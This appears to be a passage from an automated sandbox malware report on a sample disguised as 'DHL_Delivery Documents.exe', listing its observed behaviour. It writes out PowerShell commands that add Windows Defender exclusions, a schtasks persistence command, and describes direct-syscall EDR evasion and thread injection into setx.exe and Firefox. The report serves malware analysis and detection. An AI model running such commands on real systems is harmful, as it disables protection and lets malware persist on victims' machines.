            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB8B42 mov eax, dword ptr fs:[00000030h]8_2_01CB8B42
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA6B40 mov eax, dword ptr fs:[00000030h]8_2_01CA6B40
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA6B40 mov eax, dword ptr fs:[00000030h]8_2_01CA6B40
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDAB40 mov eax, dword ptr fs:[00000030h]8_2_01CDAB40
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C08B50 mov eax, dword ptr fs:[00000030h]8_2_01C08B50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE2B57 mov eax, dword ptr fs:[00000030h]8_2_01CE2B57
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE2B57 mov eax, dword ptr fs:[00000030h]8_2_01CE2B57
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE2B57 mov eax, dword ptr fs:[00000030h]8_2_01CE2B57
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE2B57 mov eax, dword ptr fs:[00000030h]8_2_01CE2B57
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBEB50 mov eax, dword ptr fs:[00000030h]8_2_01CBEB50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0CB7E mov eax, dword ptr fs:[00000030h]8_2_01C0CB7E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE4B00 mov eax, dword ptr fs:[00000030h]8_2_01CE4B00
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h]8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h]8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h]8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h]8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h]8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h]8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h]8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h]8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h]8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3EB20 mov eax, dword ptr fs:[00000030h]8_2_01C3EB20
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3EB20 mov eax, dword ptr fs:[00000030h]8_2_01C3EB20
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD8B28 mov eax, dword ptr fs:[00000030h]8_2_01CD8B28
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD8B28 mov eax, dword ptr fs:[00000030h]8_2_01CD8B28
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C66ACC mov eax, dword ptr fs:[00000030h]8_2_01C66ACC
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C66ACC mov eax, dword ptr fs:[00000030h]8_2_01C66ACC
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C66ACC mov eax, dword ptr fs:[00000030h]8_2_01C66ACC
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C10AD0 mov eax, dword ptr fs:[00000030h]8_2_01C10AD0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C44AD0 mov eax, dword ptr fs:[00000030h]8_2_01C44AD0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C44AD0 mov eax, dword ptr fs:[00000030h]8_2_01C44AD0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4AAEE mov eax, dword ptr fs:[00000030h]8_2_01C4AAEE
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4AAEE mov eax, dword ptr fs:[00000030h]8_2_01C4AAEE
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h]8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h]8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h]8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h]8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h]8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h]8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h]8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h]8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h]8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE4A80 mov eax, dword ptr fs:[00000030h]8_2_01CE4A80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C48A90 mov edx, dword ptr fs:[00000030h]8_2_01C48A90
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C18AA0 mov eax, dword ptr fs:[00000030h]8_2_01C18AA0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C18AA0 mov eax, dword ptr fs:[00000030h]8_2_01C18AA0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C66AA4 mov eax, dword ptr fs:[00000030h]8_2_01C66AA4
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h]8_2_01C16A50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h]8_2_01C16A50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h]8_2_01C16A50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h]8_2_01C16A50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h]8_2_01C16A50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h]8_2_01C16A50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h]8_2_01C16A50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20A5B mov eax, dword ptr fs:[00000030h]8_2_01C20A5B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20A5B mov eax, dword ptr fs:[00000030h]8_2_01C20A5B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4CA6F mov eax, dword ptr fs:[00000030h]8_2_01C4CA6F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtSetInformationThread: Direct from: 0x76EF2ECC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeNtCreateKey: Direct from: 0x76EF2C6C
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: NULL target: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeSection loaded: NULL target: C:\Windows\SysWOW64\setx.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: NULL target: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: NULL target: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\setx.exeThread register set: target process: 8188Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\setx.exeThread APC queued: target process: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Users\user\Desktop\DHL_Delivery Documents.exe "C:\Users\user\Desktop\DHL_Delivery Documents.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"Jump to behavior
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeProcess created: C:\Windows\SysWOW64\setx.exe "C:\Windows\SysWOW64\setx.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\setx.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000000.2559247576.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279577421.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279717921.0000000000F01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000000.2559247576.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279577421.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279717921.0000000000F01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000000.2559247576.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279577421.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279717921.0000000000F01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000000.2559247576.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279577421.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279717921.0000000000F01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeQueries volume information: C:\Users\user\Desktop\DHL_Delivery Documents.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
